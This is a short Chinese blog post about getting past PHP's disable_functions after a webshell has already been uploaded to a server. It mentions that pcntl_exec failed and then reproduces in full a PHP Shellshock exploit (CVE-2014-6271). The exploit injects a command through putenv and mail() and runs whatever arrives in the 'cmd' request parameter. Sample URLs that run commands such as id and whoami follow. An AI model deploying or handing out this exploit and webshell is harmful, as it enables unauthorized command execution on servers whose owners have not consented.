参考链接:https://github.com/l3m0n/Bypass_Disable_functions_Shell
连了菜刀无法执行命令系列。
去看phpinfo(别问我怎么看,你都能上传一句话了,phpinfo不是问题
好家伙!禁用了这么多函数,这可咋整
行我去找方法了,
试过了pcntl_exec的方法,没有成功,来用ld_preload绕过(mail
啥也别说了,上马
<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
function shellshock($cmd) {
// Execute a command via CVE-2014-6271 @mail.c:283
$tmp = tempnam(".", "data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the user may only alter environment variableswhose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variablesthat
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
// PHP will let the user modify ANY environment variable!
mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actuallysend any mail
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
return $output;
} else {
return "No output, or not vuln.";
}
}
echo shellshock($_REQUEST["cmd"]);
?>当然啦,是大佬写的,名字保留。
执行方式当然是要打全路径
比如(前边网址自行添加
exp.php?cmd=/sbin/ifconfig
exp.php?cmd=/bin/ls
exp.php?cmd=/usr/bin/id
exp.php?cmd=/usr/bin/whoami
不客气~